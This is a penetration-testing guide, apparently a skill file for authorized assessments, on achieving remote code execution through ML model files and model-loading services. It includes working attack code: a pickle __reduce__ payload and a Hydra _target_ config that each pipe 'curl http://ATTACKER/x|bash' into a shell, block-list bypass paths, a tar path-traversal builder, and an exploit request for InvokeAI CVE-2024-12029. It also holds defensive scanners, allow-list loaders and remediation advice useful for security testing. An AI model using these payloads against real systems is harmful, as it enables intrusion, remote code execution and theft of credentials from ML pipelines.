| name | exploiting-ai-model-file-rce |
| description | Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines. |
| domain | cybersecurity |
| subdomain | ai-security |
| tags | ["ai-security","model-deserialization","penetration-testing"] |
| version | 1.0 |
| author | xalgorix |
| license | Apache-2.0 |
Exploiting AI Model File RCE
When to Use
- During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
- When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
- When auto-resume/auto-deploy pipelines load checkpoints (.ckpt, .pt, .pth, .bin) without provenance checks
- When assessing web UIs and model servers such as InvokeAI, TorchServe, Triton, or NeMo/HuggingFace loaders that accept model files
- When reviewing whether "safe" formats (.safetensors, .nemo, repo config.json) still expose instantiation gadgets
Prerequisites
- Authorization: Written penetration testing agreement covering the ML systems and any callback infrastructure
- Python 3 with torch, joblib, numpy, tensorflow/keras to craft and load test artifacts in a sandbox
- fickling, modelscan, picklescan: static analyzers to inspect pickle opcodes before/after crafting payloads
- A controlled callback host: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
- Isolated VM/container: NEVER load untrusted models on your own host — payloads run during load
Critical: Techniques Most Often Missed (test these for EVERY model artifact)
Scanners that only diff weights miss code execution that fires during load, before any
inference runs. For every model file or model-loading endpoint, work the full matrix below.
# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
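# __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, and numpy
# .npy/.npz object arrays (only when loaded with allow_pickle=True).
# torch.load WITHOUT weights_only=True deserializes pickle → code exec
# (weights_only defaults to False before PyTorch 2.6, True from 2.6 on).
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://ATTACKER/x|bash",))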
# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
# formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
# when libs feed untrusted metadata to hydra.utils.instantiate().
# _target_: builtins.exec
# _args_: ["import os; os.system('id')"]
# Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system
# 3. Keras/TensorFlow Lambda layer — arbitrary Python in legacy .h5/HDF5 and
# .keras (safe_mode does NOT cover the old H5 format → "downgrade attack").
# Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.
# 4. Archive path traversal — most formats are .zip/.tar under the hood.
# Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
# arbitrary files on load (ONNX external-weights, model tars).
# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
# .gguf triggers heap overflow in the parser.
# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
# TorchServe management API (ShellTorch), Triton --model-control path
# traversal, numpy np.load with allow_pickle=True (default is False since NumPy 1.16.3).
How to CONFIRM a hit (avoid destructive payloads)
Use a benign, observable side effect — not a destructive command — to confirm execution:
- File-drop marker: os.system("id > /tmp/pwned_$(hostname)") then read /tmp/pwned_*.
- OOB callback: curl http://OOB-ID.oob.example/ or DNS lookup; a hit proves blind execution.
- Static pre-check: fickling --check-safety model.pt or modelscan -p model.pt should flag the reducer/GLOBAL+REDUCE opcodes before you ever load it.
- For Hydra: a process spawn at from_pretrained/restore_from time, before weights load.
- Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.
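The static pre-check can also be approximated with the standard library when fickling or modelscan are not available. The sketch below disassembles a pickle stream with `pickletools` (nothing is executed) and lists the globals it would import. The function names and the `DENY_ROOTS` set are illustrative assumptions, and the `STACK_GLOBAL` resolution is a heuristic that only tracks the most recent string opcodes, so treat an empty result as "nothing obvious", not as proof of safety.

```python
import pickletools
import zipfile

# Hypothetical deny-list of top-level modules worth flagging for manual review.
DENY_ROOTS = {"os", "posix", "nt", "subprocess", "builtins", "sys", "socket", "runpy", "importlib"}

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def imported_globals(data):
    """Return 'module.name' references found in a pickle stream, without loading it."""
    found, strings = set(), []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            strings.append(arg)
        elif opcode.name in ("GLOBAL", "INST"):
            # These opcodes carry "module name" as one space-separated argument.
            found.add(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Heuristic: module and name are normally the two preceding strings.
            found.add(f"{strings[-2]}.{strings[-1]}")
    return found


def flagged_globals(data):
    """Subset of imported globals whose top-level module is on the deny-list."""
    return {ref for ref in imported_globals(data) if ref.split(".")[0] in DENY_ROOTS}


def pickle_streams(path):
    """Yield (name, bytes) for a raw pickle, or for each .pkl member of a zip checkpoint."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            for name in zf.namelist():
                if name.endswith(".pkl"):
                    yield name, zf.read(name)
    else:
        with open(path, "rb") as fh:
            yield path, fh.read()
```

A legitimate state dict still imports globals such as `collections.OrderedDict` and tensor rebuild helpers, so the useful signal is which names appear, not whether any appear.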
Workflow
Step 1: Identify the Loader and Format
Determine exactly how the target ingests models and which API does the deserialization.
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl
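File extensions are unreliable, so it can help to classify an artifact by its leading bytes before choosing a scanner. The following is a minimal sketch with a hypothetical helper name; the safetensors check is a heuristic (an 8-byte length followed by the opening brace of a JSON header), and legacy protocol 0/1 pickles have no magic bytes, so they fall through to "unknown".

```python
def sniff_model_format(path):
    """Guess the container format of a model file from its first bytes."""
    with open(path, "rb") as fh:
        head = fh.read(512)
    if head.startswith(b"PK\x03\x04"):
        return "zip"          # e.g. PyTorch zip checkpoints, .keras, .npz
    if head.startswith(b"\x89HDF\r\n\x1a\n"):
        return "hdf5"         # legacy Keras .h5
    if head.startswith(b"GGUF"):
        return "gguf"
    if head.startswith(b"\x93NUMPY"):
        return "npy"
    if head.startswith(b"\x1f\x8b"):
        return "gzip"         # often a compressed tar
    if head[257:262] == b"ustar":
        return "tar"
    if len(head) >= 2 and head[0] == 0x80 and 2 <= head[1] <= 5:
        return "pickle"       # protocol 2 or newer
    if len(head) >= 9 and head[8:9] == b"{":
        return "safetensors"  # heuristic: u64 header length, then JSON
    return "unknown"
```

A "zip" or "tar" result means the archive members still need to be listed and inspected individually, since the pickle or config of interest sits inside the container.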
Step 2: Craft a PyTorch / pickle Reducer Payload
The reducer returns a callable + args executed during unpickling.
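import os
import torch
class Evil:
    def __reduce__(self):
        # Benign, observable side effects only: marker file plus OOB callback.
        return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))
# The reducer is serialized here and only runs when the file is later loaded.
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")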
Victim-side, the payload fires during unpickling, so it runs even if the load later raises an error: torch.load("malicious.ckpt", weights_only=False).
A raw .pkl works the same way with pickle.dump(Evil(), f).
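To check whether a hardened loader actually stops the reducer, the same artifact can be fed to an allow-listed unpickler. This is a minimal sketch of the "restricting globals" pattern from the Python `pickle` documentation; the `ALLOWED` set and the `safe_loads` name are assumptions for illustration, and a real loader would need its own reviewed list.

```python
import io
import pickle

# Hypothetical allow-list: only these (module, name) pairs may be imported.
ALLOWED = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream wants to import; refuse by default.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Unpickle bytes, raising UnpicklingError on any global outside ALLOWED."""
    return AllowListUnpickler(io.BytesIO(data)).load()
```

If the crafted checkpoint raises `UnpicklingError` here and no marker file or callback appears, the mitigation held for that payload; plain containers such as dicts and lists still load because they need no globals.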
Step 3: Craft a Hydra _target_ Payload for "Safe" Formats
When the loader passes model metadata/config to hydra.utils.instantiate(), no pickle is required.
_target_: builtins.exec
_args_:
- "import os; os.system('curl http://ATTACKER/x|bash')"
If a string block-list is present, bypass via alternative import paths
(enum.bltns.eval) or application-resolved names (nemo.core.classes.common.os.system).
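Because block-lists can be bypassed through alternative dotted paths, a review of a config is more reliable when it compares every `_target_` against exact allowed names. The sketch below walks an already-parsed config (nested dicts and lists) and reports each `_target_` that is not on an allow-list. `ALLOWED_TARGETS` and the function names are hypothetical, and exact matching is used on purpose: a prefix match such as `torch.nn.` could be satisfied by a path that walks through a module attribute to reach `os.system`.

```python
# Hypothetical allow-list of exact dotted names the application really needs.
ALLOWED_TARGETS = {"torch.nn.Linear", "torch.optim.AdamW"}


def find_targets(node, path="$"):
    """Yield (location, target) for every `_target_` key in a nested config."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "_target_":
                yield path, value
            else:
                yield from find_targets(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from find_targets(item, f"{path}[{index}]")


def disallowed_targets(config, allowed=ALLOWED_TARGETS):
    """Return the `_target_` entries that are not exact members of the allow-list."""
    return [(loc, tgt) for loc, tgt in find_targets(config) if tgt not in allowed]
```

Any non-empty result on metadata taken from a model file is worth reporting even before execution is confirmed, since it shows attacker-controlled data reaching an instantiation key.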
Step 4: Craft Archive Traversal / Keras Lambda Variants
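import tarfile
from pathlib import Path
Path("harmless.txt").write_text("benign marker\n")  # file the archive will carry
def escape(member):
    # Rewrite the stored name so extraction resolves outside the target directory.
    member.name = "../../tmp/hacked"
    return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)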
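Before handing such an archive to a loader, its member list can be audited without extracting anything. The sketch below, with a hypothetical `risky_members` helper, flags absolute paths, `..` components, and symlink or hardlink members; it is a rough pre-check and does not model every platform-specific path quirk.

```python
import tarfile


def risky_members(archive_path):
    """List (member_name, reason) pairs for tar members that could escape the extraction root."""
    findings = []
    with tarfile.open(archive_path) as tf:
        for member in tf.getmembers():
            parts = member.name.replace("\\", "/").split("/")
            if member.name.startswith("/") or ".." in parts:
                findings.append((member.name, "path escapes extraction root"))
            if member.issym() or member.islnk():
                findings.append((member.name, f"link to {member.linkname}"))
    return findings
```

On Python 3.12 and later, `tarfile` extraction also accepts `filter="data"`, which rejects most of these members at extraction time, so it is worth noting in findings whether the target loader uses it.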
Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)
When a service downloads+loads models from a URL, host the payload and trigger the endpoint.
import requests
requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
    json={}, timeout=5,
)
For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is
delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.
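Blind confirmation in this step depends on the controlled callback host from the prerequisites. If a hosted OOB service is out of scope, a small standard-library listener can record incoming requests. The class and function names below are illustrative assumptions, and the default bind address is loopback; an engagement would bind to whatever interface the rules of engagement allow.

```python
import http.server
import threading


class CallbackLog(http.server.BaseHTTPRequestHandler):
    hits = []  # shared list of (client_ip, request_path) tuples

    def do_GET(self):
        # Record the hit first, then answer with an empty 204 response.
        self.hits.append((self.client_address[0], self.path))
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; hits are kept in CallbackLog.hits


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a daemon thread; port=0 lets the OS pick a free port."""
    server = http.server.ThreadingHTTPServer((host, port), CallbackLog)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Using a unique path per test case (for example one token per payload) makes it possible to tell which artifact triggered a given entry in `CallbackLog.hits`.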
Step 6: Confirm and Assess Blast Radius
Confirm execution with the benign marker or OOB callback described above, then record what the compromised loader can reach: the user it runs as, whether it is containerized, which credentials are mounted, and whether it has network egress.
Key Concepts
| Concept | Description |
|---|---|
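| Pickle Reducer | __reduce__ (or __reduce_ex__) returns a callable plus args that the unpickler calls during load; __setstate__ of an importable class also runs at load time. This is the core RCE primitive |
| weights_only | torch.load(file, weights_only=True) restricts unpickling to an allow-list of tensor-related types; weights_only=False (the default before PyTorch 2.6) enables RCE. CVE-2025-32434 bypasses weights_only=True on PyTorch <= 2.5.1 |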
| Hydra instantiate | hydra.utils.instantiate() imports+calls any dotted _target_ from untrusted config/metadata, no pickle needed |
| Lambda layer RCE | Keras Lambda layers store arbitrary Python; legacy .h5 bypasses safe_mode (downgrade attack) |
| Archive slip | Model formats are .zip/.tar; crafted member names or symlinks cause path traversal write/read on load |
| Parser memory corruption | Malformed GGUF/TFLite files trigger heap overflows in native parsers |
| Safe format ≠ safe load | .safetensors/.nemo carry metadata that can still reach an instantiation gadget |
Tools & Systems
| Tool | Purpose |
|---|---|
| fickling | Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE |
| modelscan (Protect AI) | Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading |
| picklescan | Lightweight scanner for dangerous imports/opcodes in pickle files |
| Metasploit | invokeai_rce_cve_2024_12029, flowise_* and other model-service RCE modules |
| safetensors | Non-executable weights format; recommended remediation target |
| Isolated VM/container | Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress) |
Common Scenarios
Scenario 1: Trojanized Checkpoint in a Model Hub
A .ckpt shared on an internal hub embeds a __reduce__ gadget. An auto-resume training job
calls torch.load(..., weights_only=False) and executes the payload as root in the training container.
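The provenance check missing in this scenario can be as small as a pinned digest compared before the file is opened. The sketch below is one possible shape, with hypothetical function names; it assumes the expected SHA-256 value comes from a trusted source such as a signed manifest, which the source scenario does not describe.

```python
import hashlib
import hmac


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_pinned(path, expected_hex):
    """Return True only if the file's SHA-256 matches the pinned hex digest."""
    return hmac.compare_digest(sha256_file(path), expected_hex.lower())
```

During an assessment, the absence of any equivalent gate in the auto-resume path is itself a finding, independent of whether a payload was delivered.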
Scenario 2: InvokeAI URL Install RCE
InvokeAI 5.3.1–5.4.2 exposes /api/v2/models/install with scan=false default. Pointing source
at an attacker-hosted .ckpt triggers torch.load pickle deserialization and unauthenticated RCE.
Scenario 3: "Safe" Format Still Pops a Shell
A .safetensors model ships an __metadata__ block with _target_: builtins.exec. The loader feeds
metadata to hydra.utils.instantiate() during from_pretrained, executing code before weights load.
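The metadata block in this scenario can be inspected without any model library, because a .safetensors file starts with an 8-byte little-endian header length followed by a JSON header. The sketch below reads only that header and lists the `__metadata__` keys whose values mention `_target_`. The function names and the size cap are assumptions, and the substring match is deliberately crude, so hits need manual review.

```python
import json
import struct


def read_safetensors_metadata(path, max_header=100 * 1024 * 1024):
    """Return the __metadata__ mapping from a .safetensors header without loading tensors."""
    with open(path, "rb") as fh:
        (header_len,) = struct.unpack("<Q", fh.read(8))
        if header_len > max_header:
            raise ValueError("header length implausibly large")
        header = json.loads(fh.read(header_len))
    return header.get("__metadata__", {})


def metadata_keys_with_target(path):
    """List metadata keys whose value contains the string '_target_'."""
    metadata = read_safetensors_metadata(path)
    return [key for key, value in metadata.items() if "_target_" in str(value)]
```

A hit only shows that an instantiation key is present in the file; whether it is reachable still depends on the loader passing that metadata to an instantiate call.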
Scenario 4: ONNX/Model Tar Path Traversal
A model tar contains a member named ../../home/user/.bashrc. Extraction during model load overwrites
the file, achieving persistence/RCE on the next shell session.
Output Format
## AI Model File RCE Finding
**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)
### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example
### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |
### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions